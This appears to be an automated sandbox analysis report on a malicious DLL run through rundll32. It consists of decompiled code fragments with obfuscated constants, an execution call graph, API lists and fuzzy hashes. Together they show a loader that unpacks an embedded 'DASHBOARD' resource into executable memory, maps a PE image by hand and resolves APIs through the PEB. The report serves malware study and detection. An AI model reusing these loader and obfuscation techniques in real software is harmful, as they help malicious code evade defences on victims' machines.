                                                                                                                    			E001CB23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				void* _t27;
                                                                                                                    				int _t32;
                                                                                                                    
                                                                                                                    				_push(__ecx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				_push(_a16);
                                                                                                                    				_push(_a12);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E001D20B9(_t27);
                                                                                                                    				_v12 = 0x6268;
                                                                                                                    				_v12 = _v12 ^ 0x57e834c3;
                                                                                                                    				_v12 = _v12 + 0xffff2919;
                                                                                                                    				_v12 = _v12 + 0xffff3e3d;
                                                                                                                    				_v12 = _v12 ^ 0x57e9dc2b;
                                                                                                                    				_v8 = 0xa46433;
                                                                                                                    				_v8 = _v8 + 0x98ba;
                                                                                                                    				_v8 = _v8 | 0xc390ebe9;
                                                                                                                    				_v8 = _v8 + 0xd5b0;
                                                                                                                    				_v8 = _v8 ^ 0xc3bab866;
                                                                                                                    				E001DAA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
                                                                                                                    				_t32 = lstrcmpiW(_a16, _a4); // executed
                                                                                                                    				return _t32;
                                                                                                                    			}








                                                                                                                    APIs
                                                                                                                    • lstrcmpiW.KERNEL32(EE1E6DE5,57E9DC2B), ref: 001CB2C1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1586166983-0
                                                                                                                    • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                    • Instruction ID: 15c71d46371b61a2cd164fd148c8d86095800ac210e70d66d9648c1e064faf3e
                                                                                                                    • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                    • Instruction Fuzzy Hash: FB011A72C04608FFDF45DFD4DD468AEBB75EB54304F108189F90566252E3714B609B51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 72%
                                                                                                                    			E001D1E67(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				intOrPtr _v20;
                                                                                                                    				intOrPtr _v24;
                                                                                                                    				void* _t23;
                                                                                                                    				int _t29;
                                                                                                                    
                                                                                                                    				_push(_a12);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E001D20B9(_t23);
                                                                                                                    				_v16 = _v16 & 0x00000000;
                                                                                                                    				_v24 = 0x62b4e9;
                                                                                                                    				_v20 = 0xc383c4;
                                                                                                                    				_v12 = 0x238243;
                                                                                                                    				_v12 = _v12 * 0x67;
                                                                                                                    				_v12 = _v12 ^ 0x0e4d658b;
                                                                                                                    				_v8 = 0x6564d0;
                                                                                                                    				_v8 = _v8 ^ 0x2b193590;
                                                                                                                    				_v8 = _v8 << 0xd;
                                                                                                                    				_v8 = _v8 ^ 0x8a2acb03;
                                                                                                                    				E001DAA30(0x23f, 0x9df7cc0d, __ecx, 0x3185251c);
                                                                                                                    				_t29 = CloseHandle(_a12); // executed
                                                                                                                    				return _t29;
                                                                                                                    			}











                                                                                                                    APIs
                                                                                                                    • CloseHandle.KERNEL32(00C383C4), ref: 001D1EE1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2962429428-0
                                                                                                                    • Opcode ID: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
                                                                                                                    • Instruction ID: a528df66d266e05178aa6e84feaa89f2cff58e4358b7922b8a9b1155a79d977d
                                                                                                                    • Opcode Fuzzy Hash: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
                                                                                                                    • Instruction Fuzzy Hash: 780124B5C00208FBCF40EFA4E94A9AEBFB5EB14308F508499E81567212D7718B24DF91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:16.1%
                                                                                                                    Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:297
                                                                                                                    Total number of Limit Nodes:23
32017->32019 32018 1002faee _realloc ___BuildCatchObjectHelper 32018->31962 32019->32018 32029 1002fab4 32019->32029 32052 10035a99 67 API calls 2 library calls 32019->32052 32020 1002fac9 HeapFree 32020->32018 32022 1002fadb 32020->32022 32055 100311f4 67 API calls __getptd_noexit 32022->32055 32024 1002fae0 GetLastError 32024->32018 32025 1002faa6 32054 1002fabf LeaveCriticalSection _doexit 32025->32054 32026 1002fa8c ___sbh_find_block 32026->32025 32053 10035b3d VirtualFree VirtualFree HeapFree __fptostr 32026->32053 32029->32018 32029->32020 32030->31928 32031->31989 32032->31993 32034 10030684 ___BuildCatchObjectHelper 32033->32034 32035 1003069c 32034->32035 32045 100306bb _memset 32034->32045 32046 100311f4 67 API calls __getptd_noexit 32035->32046 32037 100306a1 32047 10037753 4 API calls 2 library calls 32037->32047 32039 1003072d RtlAllocateHeap 32039->32045 32042 100306b1 ___BuildCatchObjectHelper 32042->31997 32045->32039 32045->32042 32048 10035a99 67 API calls 2 library calls 32045->32048 32049 100362e6 5 API calls 2 library calls 32045->32049 32050 10030774 LeaveCriticalSection _doexit 32045->32050 32051 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32045->32051 32046->32037 32048->32045 32049->32045 32050->32045 32051->32045 32052->32026 32053->32025 32054->32029 32055->32024 32057 1002f9a6 _malloc 67 API calls 32056->32057 32058 10006aa1 32057->32058 32059 1002fa69 ___wtomb_environ 67 API calls 32058->32059 32060 10006aad 32058->32060 32059->32060 32060->31966 32060->31967 32062 1002fb18 32061->32062 32063 1002fb3f __VEC_memcpy 32062->32063 32064 100127eb 32062->32064 32063->32064 32065 1002f9a6 32064->32065 32066 1002fa53 32065->32066 32077 1002f9b4 32065->32077 32099 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32066->32099 32068 1002fa59 32100 100311f4 67 API calls __getptd_noexit 32068->32100 32071 1002fa5f 32071->31980 32074 1002fa17 RtlAllocateHeap 32074->32077 32075 
1002f9c9 32075->32077 32092 10036892 67 API calls 2 library calls 32075->32092 32093 100366f2 67 API calls 7 library calls 32075->32093 32094 10030e7b GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 32075->32094 32077->32074 32077->32075 32078 1002fa4a 32077->32078 32079 1002fa3e 32077->32079 32082 1002fa3c 32077->32082 32095 1002f957 67 API calls 4 library calls 32077->32095 32096 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32077->32096 32078->31980 32097 100311f4 67 API calls __getptd_noexit 32079->32097 32098 100311f4 67 API calls __getptd_noexit 32082->32098 32085 1002f9a6 _malloc 67 API calls 32084->32085 32086 10002990 32085->32086 32086->31982 32101 10002280 32087->32101 32090->31984 32091->31972 32092->32075 32093->32075 32095->32077 32096->32077 32097->32082 32098->32078 32099->32068 32100->32071 32138 10001990 32101->32138 32104 100022c3 SetLastError 32135 100022a9 32104->32135 32105 100022d5 32106 10001990 ___DllMainCRTStartup SetLastError 32105->32106 32107 100022ee 32106->32107 32108 10002310 SetLastError 32107->32108 32109 10002322 32107->32109 32107->32135 32108->32135 32110 10002331 SetLastError 32109->32110 32111 10002343 32109->32111 32110->32135 32112 1000234e SetLastError 32111->32112 32114 10002360 GetNativeSystemInfo 32111->32114 32112->32135 32115 10002414 SetLastError 32114->32115 32116 10002426 VirtualAlloc 32114->32116 32115->32135 32117 10002472 GetProcessHeap HeapAlloc 32116->32117 32118 10002447 VirtualAlloc 32116->32118 32120 100024ac 32117->32120 32121 1000248c VirtualFree SetLastError 32117->32121 32118->32117 32119 10002463 SetLastError 32118->32119 32119->32135 32122 10001990 ___DllMainCRTStartup SetLastError 32120->32122 32121->32135 32123 1000250e 32122->32123 32124 10002512 32123->32124 32125 1000251c VirtualAlloc 32123->32125 32176 10002840 VirtualFree VirtualFree GetProcessHeap HeapFree ___DllMainCRTStartup 32124->32176 32126 1000254b ___DllMainCRTStartup 32125->32126 
32141 100019c0 32126->32141 32129 1000257f ___DllMainCRTStartup 32129->32124 32151 10001ff0 32129->32151 32133 100025e8 ___DllMainCRTStartup 32133->32124 32133->32135 32170 35e991 32133->32170 32135->31984 32136 1000264f SetLastError 32136->32124 32139 100019ab 32138->32139 32140 1000199f SetLastError 32138->32140 32139->32104 32139->32105 32139->32135 32140->32139 32142 100019f0 32141->32142 32143 10001a83 32142->32143 32145 10001a2c VirtualAlloc 32142->32145 32150 10001aa0 ___DllMainCRTStartup 32142->32150 32144 10001990 ___DllMainCRTStartup SetLastError 32143->32144 32146 10001a9c 32144->32146 32147 10001a50 32145->32147 32148 10001a57 ___DllMainCRTStartup 32145->32148 32149 10001aa4 VirtualAlloc 32146->32149 32146->32150 32147->32150 32148->32142 32149->32150 32150->32129 32152 10002029 IsBadReadPtr 32151->32152 32161 1000201f 32151->32161 32154 10002053 32152->32154 32152->32161 32155 10002085 SetLastError 32154->32155 32156 10002099 32154->32156 32154->32161 32155->32161 32177 100018b0 VirtualQuery VirtualFree VirtualAlloc ___DllMainCRTStartup 32156->32177 32158 100020b3 32159 100020bf SetLastError 32158->32159 32162 100020e9 32158->32162 32159->32161 32161->32124 32164 10001cb0 32161->32164 32162->32161 32163 100021f9 SetLastError 32162->32163 32163->32161 32165 10001cf8 ___DllMainCRTStartup 32164->32165 32166 10001e01 32165->32166 32168 10001ddd 32165->32168 32178 10001b80 32165->32178 32167 10001b80 ___DllMainCRTStartup 2 API calls 32166->32167 32167->32168 32168->32133 32171 35ea62 32170->32171 32175 35ea8d 32170->32175 32185 35f8fd 32171->32185 32175->32135 32175->32136 32176->32135 32177->32158 32179 10001b9c 32178->32179 32181 10001b92 32178->32181 32180 10001baa 32179->32180 32183 10001c04 VirtualProtect 32179->32183 32180->32181 32184 10001be2 VirtualFree 32180->32184 32181->32165 32183->32181 32184->32181 32195 35fde0 32185->32195 32186 35ffd1 32209 35ab87 32186->32209 32189 35ea75 32189->32175 32198 3593ed 32189->32198 32192 36dcf7 GetPEB 
32192->32195 32195->32186 32195->32189 32195->32192 32197 35a8b0 GetPEB 32195->32197 32201 35b23c 32195->32201 32205 3646bb 32195->32205 32219 36da22 GetPEB 32195->32219 32220 3547ce GetPEB 32195->32220 32221 35f899 GetPEB 32195->32221 32222 354b61 32195->32222 32197->32195 32199 36aa30 GetPEB 32198->32199 32200 359456 ExitProcess 32199->32200 32200->32175 32202 35b254 32201->32202 32226 36aa30 32202->32226 32206 3646da 32205->32206 32207 36aa30 GetPEB 32206->32207 32208 364729 SHGetFolderPathW 32207->32208 32208->32195 32210 35abb0 32209->32210 32211 354b61 GetPEB 32210->32211 32212 35ad67 32211->32212 32234 357f5d 32212->32234 32214 35ad99 32215 35ada4 32214->32215 32238 361e67 GetPEB 32214->32238 32215->32189 32217 35adc4 32239 361e67 GetPEB 32217->32239 32219->32195 32220->32195 32221->32195 32223 354b74 32222->32223 32240 351ea7 32223->32240 32227 35b2b8 lstrcmpiW 32226->32227 32228 36ab1d 32226->32228 32227->32195 32232 360a0e GetPEB 32228->32232 32230 36ab33 32233 35cdcd GetPEB 32230->32233 32232->32230 32233->32227 32235 357f8e 32234->32235 32236 36aa30 GetPEB 32235->32236 32237 357fd4 CreateProcessW 32236->32237 32237->32214 32238->32217 32239->32215 32241 351ebc 32240->32241 32244 35702c 32241->32244 32245 357049 32244->32245 32246 36aa30 GetPEB 32245->32246 32247 351f4c 32246->32247 32247->32195

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                    • _printf.LIBCMT ref: 1001265F
                                                                                                                    • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                    • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                    • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
                                                                                                                    • _malloc.LIBCMT ref: 100127F5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.544337274.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.544330321.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544516236.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544566092.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544607555.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544628440.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                    • String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
                                                                                                                    • API String ID: 572389289-2839844625
                                                                                                                    • Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                    • Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
                                                                                                                    • Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                    • Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                    • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.544337274.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.544330321.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544516236.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544566092.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544607555.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544628440.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1452528299-0
                                                                                                                    • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                    • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                    • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                    • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • _malloc.LIBCMT ref: 10006A9C
                                                                                                                      • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                      • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                      • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.544337274.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.544330321.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544516236.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544566092.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544607555.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544628440.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap_malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 501242067-0
                                                                                                                    • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                    • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                    • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                    • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                    • GlobalHandle.KERNEL32(00827AC0), ref: 100208A9
                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                    • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                    • GlobalHandle.KERNEL32(00827AC0), ref: 100208DB
                                                                                                                    • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                    • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                    • _memset.LIBCMT ref: 10020911
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.544337274.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.544330321.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544516236.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544566092.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544607555.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544628440.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 496899490-0
                                                                                                                    • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                    • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                    • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                    • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • __lock.LIBCMT ref: 1002FA87
                                                                                                                      • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                      • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                      • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                    • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                    • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                    • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                    • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.544337274.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.544330321.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544516236.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544566092.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544607555.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544628440.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2714421763-0
                                                                                                                    • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                    • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                    • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                    • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 235 10036624-10036642 HeapCreate 236 10036647-10036654 call 100365c9 235->236 237 10036644-10036646 235->237 240 10036656-10036663 call 10035aca 236->240 241 1003667a-1003667d 236->241 240->241 244 10036665-10036678 HeapDestroy 240->244 244->237
                                                                                                                    APIs
                                                                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                    • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.544337274.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.544330321.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544516236.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544566092.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544607555.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544628440.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$CreateDestroy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3296620671-0
                                                                                                                    • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                    • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                    • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                    • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 245 100019c0-100019ee 246 10001a02-10001a0e 245->246 247 10001a14-10001a1b 246->247 248 10001b06 246->248 249 10001a83-10001a9e call 10001990 247->249 250 10001a1d-10001a2a 247->250 251 10001b0b-10001b0e 248->251 260 10001aa0-10001aa2 249->260 261 10001aa4-10001ac9 VirtualAlloc 249->261 253 10001a2c-10001a4e VirtualAlloc 250->253 254 10001a7e 250->254 257 10001a50-10001a52 253->257 258 10001a57-10001a7b call 100017c0 253->258 254->246 257->251 258->254 260->251 263 10001acb-10001acd 261->263 264 10001acf-10001afe call 10001810 261->264 263->251 264->248
                                                                                                                    APIs
                                                                                                                    • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                    • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.544337274.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.544330321.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544516236.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544566092.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544607555.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544628440.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
